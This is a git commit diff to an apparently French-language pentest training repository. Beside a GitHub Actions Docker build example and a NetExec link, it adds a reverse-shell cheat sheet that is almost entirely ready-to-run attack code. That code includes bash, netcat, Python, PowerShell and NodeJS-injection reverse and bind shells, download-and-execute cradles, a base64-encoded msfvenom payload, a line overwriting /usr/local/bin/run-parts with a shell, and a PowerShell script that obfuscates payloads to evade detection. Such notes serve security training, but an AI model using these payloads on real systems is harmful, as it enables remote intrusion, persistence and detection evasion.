Merge ReverseShell + Docker actions + NetExec

Dojo-101-DevSec/Docker.md

@@ -188,6 +188,43 @@ docker build .
 
 l'image est ensuite ajouté (`docker image ls`)
 
+Exemple de build via github acitons : 
+
+```yml
+name: Docker
+
+on:
+  push:
+    branches:
+      - main
+  pull_request:
+    branches:
+      - main
+
+jobs:
+  build:
+    runs-on: ubuntu-latest
+
+    steps:
+    - name: Checkout code
+      uses: actions/checkout@v2
+
+    - name: Set up Docker Buildx
+      uses: docker/setup-buildx-action@v1
+
+    - name: Build Docker image
+      run: docker build -t vulnerablelightapp .
+
+    - name: Run Docker container
+      run: docker run -d -p 3000:3000 vulnerablelightapp
+
+    - name: Wait for the container to be ready
+      run: sleep 30
+
+    - name: Test the application
+      run: curl -k https://127.0.0.1:3000
+```
+
 
 ## Docker Compose
 

Dojo-101-Pentest/1-RECON-SCAN-ENUM/Windows-AD-et SMB.md

@@ -1,8 +1,14 @@
 # Windows AD et SMB (reseau)
 
+
+## Netexec
+
+[NetExec](https://github.com/Pennyw0rth/NetExec)
+
+
 ## Responder
 
-[Projet](https://github.com/lgandx/Responder)
+[Responder](https://github.com/lgandx/Responder)
 
 ### llmnr et netbios spoofing, netLM interception
 

Dojo-101-Pentest/2-WEAPON-EXPLOIT/ReverseShell.md

@@ -0,0 +1,232 @@
+# Reverseshell
+
+### Ressources
+
+[ReverseShell générator](https://www.revshells.com/)
+
+## Bash
+
+### Certaines versions de Bash permettent de transmettre un reverse-shell  via « /dev/tcp/ » ou « /dev/udp/ » (version compilée avec le drapeau  « –enable-net-redirections »).
+
+```sh
+bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
+
+exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do $line 2>&5 >&5; done
+
+exec /bin/sh 0</dev/tcp/<IP>/<PORT> 1>&0 2>&0
+
+0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196
+
+echo "/bin/bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'" >  file 
+
+echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.13.131/443 0>&1'" > /usr/local/bin/run-parts
+
+'echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMy4yNS80NDMgMD4mMQ==|base64${IFS}-d|bash;'
+```
+
+
+## powershell
+
+### classique
+
+```pwsh
+$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
+```
+
+
+### sans prompt:
+
+```powershell
+$client=New-Object System.Net.Sockets.TCPClient("127.0.0.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String )$sendback2  = $sendback ;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
+```
+
+### reverseshell
+
+```powershell
+$rs = '
+$c=nEw-OBJeCt SYsTEm.nET.SOcKetS.tcpcLIENT((wRiTe-oUtpuT 127.0.0.1),10443);$s=$c.gETsTrEaM();[BYtE[]]$b=0..65535|%{0};wHILe(($i=$s.rEAd($b,0,$b.LENgTh))-NE0){$a=(NEw-oBJeCT -tYPenAME sYSteM.tEXT.aScIieNcOdInG).gETsTRIng($b,0,$i);$k=(iEX $a 2>&1|oUt-stRInG);$z=$k+(WrITe-OuTPut `>);$d=([teXT.eNcODiNg]::aSCii).gETByTEs($z);$s.wRiTE($d,0,$d.LEnGtH);$s.fLuSH()};$c.cLoSE()
+'
+```
+
+### Download
+
+```powershell
+powershell -c "iex(New-Object Net.WebClient).DownloadString('http://10.9.2.43:8000/script.ps1')"
+
+powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.9.1.214:8000/myshell.exe','myshell.exe')"
+```
+
+### Executer directement
+
+```powershell
+(iwr <IP>).content |Iex
+```
+
+
+
+## netcat
+
+### reverseshell
+
+Notes : selon les versions `-c` remplace `-e`
+
+```sh
+nc 10.0.0.1 1234 -e /bin/sh
+nc 10.0.0.1 1234 -e cmd.exe
+nc -e /bin/sh 10.0.0.1 1234
+```
+
+### listener
+
+```sh
+nc -nvlp 443
+```
+
+### file transfert
+
+alice:
+
+```sh
+nc -lnvp 10443 < lse.sh
+```
+
+bob:
+
+```sh
+nc IP 10443 > lse.sh
+```
+
+### bind shell
+
+```sh
+nc -l -p <port> -e /bin/bash
+```
+
+### sans options
+
+victime
+
+```sh
+mknod /tmp/backpipe p 
+/bin/sh 0</tmp/backpipe | nc pentestbox 443 1>/tmp/backpipe
+```
+
+### nc traditional: 
+
+```sh
+/usr/bin/nc.traditional
+```
+
+### Windows
+
+```powershell
+powershell -c “iwr http://10.10.14.4:8000/nc64.exe -outfile c:\temp/nc64.exe”
+c:\temp\nc64.exe 10.10.14.4 10443 -e powershell
+```
+
+### mkfifo
+
+```sh
+rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
+```
+
+
+## Powrshell obfusquer le payload
+
+```powershell
+[byte[]] $scriptBytes = [system.Text.Encoding]::UTF8.GetBytes($rs)
+
+#byte rotation
+$rot = Get-Random -Maximum 254 -Minimum 5
+$derot = 255 - $rot
+$rotbytes = [system.Text.Encoding]::UTF8.GetBytes('')
+$scriptBytes | %{ $rotbytes += ($_ + $rot)%255}
+
+
+#payload in byte without rotation here:
+#$output = ""
+#$scriptBytes |% {$output += $_.tostring()+ ","}
+#$output = $output -replace ".$"
+#$output =  "[sYsTeM.TeXT.eNcOdInG]::asCii.gEtsTRiNG(`$([bYtE]" + $output + "))|IEx"
+#write-host $output
+
+#payload in byte WITH rotation:
+$output = ""
+$rotBytes |% {$output += $_.tostring()+ ","}
+$output = $output -replace ".$"
+
+$rand1 = Get-Random -Maximum 254 -Minimum 5 ; $rand2 = Get-Random -Maximum 254 -Minimum 5 ; $rand3 = Get-Random -Maximum 254 -Minimum 5
+
+#$output =  "`$([bYtE]" + $output + ")" #objet de type byte
+#$output =  "`$d;`$([bYtE]" + $output + ")|%{ `$d+=(`$_ + $rot)%255};`$d" #payload déchiffré
+#$output =  "`$255=[system.Text.Encoding]::UTF8.GetBytes('');[sYsTeM.TeXT.eNcOdInG]::asCii.gEtsTRiNG(`$(`$([bYtE]" + $output + ")|%{`$255+=(`$_+$derot)%255};`$255))|iEx"
+#$output =  "`$0=255;`$133=[sYsTeM.TeXT.eNcOdInG];`$255=`$133::utF8.gEtbYtES('');`$133::asCii.gEtsTRiNG(`$(`$([bYtE]" + $output + ")|%{`$255+=(`$_+(255+$derot-255))%`$0};`$255))|iEx"
+#$output =  "`$0=255;`$133=[sYsTeM.TeXT.eNcOdInG];[BytE[]]`$255='';`$133::asCii.gEtsTRiNG(`$(`$([bYtE]" + $output + ")|%{`$255+=(`$_+(255+$derot-255))%`$0};`$255))|iEx" #erreur non bloquante à ;[BytE[]]`$255=''
+$output =  "`$$rand2=255;`$$rand1=[sYsTeM.TeXT.eNcOdInG];[BytE[]]`$$rand3='';`$$rand1::asCii.gEtsTRiNG(`$(([bYtE]" + $output + ")|%{`$$rand3+=(`$_+(`$$rand2+$derot))%`$$rand2};`$$rand3))|iEx"
+
+write-host $output
+```
+
+## msfvenom
+
+```sh
+msfvenom -p cmd/unix/reverse_python LHOST=10.10.13.149 LPORT=10443 -f raw 
+
+[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
+[-] No arch selected, selecting arch: cmd from the payload
+No encoder or badchars specified, outputting raw payload
+Payload size: 525 bytes
+python -c "exec('aW1wb3J0IHNvY2tldCAgICAgLCAgICBzdWJwcm9jZXNzICAgICAsICAgIG9zICAgICA7ICAgIGhvc3Q9IjEwLjEwLjEzLjE0OSIgICAgIDsgICAgcG9ydD0xMDQ0MyAgICAgOyAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgICwgICAgc29ja2V0LlNPQ0tfU1RSRUFNKSAgICAgOyAgICBzLmNvbm5lY3QoKGhvc3QgICAgICwgICAgcG9ydCkpICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAwKSAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICwgICAgMSkgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpICAgICAsICAgIDIpICAgICA7ICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"
+```
+
+## python
+
+```python
+python -c 'import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect( ("192.168.1.20",1234)); os.dup2 (s.fileno() ,0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call( ["/bin/sh","-i"] );'
+```
+
+```python
+import os,socket,subprocess,threading;
+def s2p(s, p):
+    while True:
+        data = s.recv(1024)
+        if len(data) > 0:
+            p.stdin.write(data)
+
+def p2s(s, p):
+    while True:
+        s.send(p.stdout.read(1))
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect(("192.168.1.20",4444))
+
+p=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
+
+s2p_thread = threading.Thread(target=s2p, args=[s, p])
+s2p_thread.daemon = True
+s2p_thread.start()
+
+p2s_thread = threading.Thread(target=p2s, args=[s, p])
+p2s_thread.daemon = True
+p2s_thread.start()
+
+try:
+    p.wait()
+except KeyboardInterrupt:
+    s.close()
+```
+
+
+
+### exemple d'injection python avec eval(..):
+
+```python
+__import__("os").system("nc 10.10.13.149 10443 -e /bin/sh").read()
+__import__(\"os\").system(\"nc 10.10.13.149 10443 -e /bin/sh").read()
+```
+
+## NodeJS
+
+```bash
+curl http://127.0.0.1:21440/admin -X POST -d '{"key":"\"); const { exec } = require(\"child_process\"); exec(\"nc -e /bin/bash 127.0.0.1 1234\"); //"}'
+```

Dojo-101-Pentest/2-WEAPON-EXPLOIT/Web-Injection-NodeJS.md

@@ -49,10 +49,4 @@ curl -X POST http://167.99.88.216:32153/admin -d '{"key":"\"); const { exec } =
 ```bash
 curl http://127.0.0.1:21440/admin -X POST -d '{"key":"\"); const { exec } = require(\"child_process\"); exec(\"ping -c 3 127.0.0.1\"); //"}'
 sudo tcpdump -i lo icmp
-```
-
-### ReverseShell
-
-```bash
-curl http://127.0.0.1:21440/admin -X POST -d '{"key":"\"); const { exec } = require(\"child_process\"); exec(\"nc -e /bin/bash 127.0.0.1 1234\"); //"}'
 ```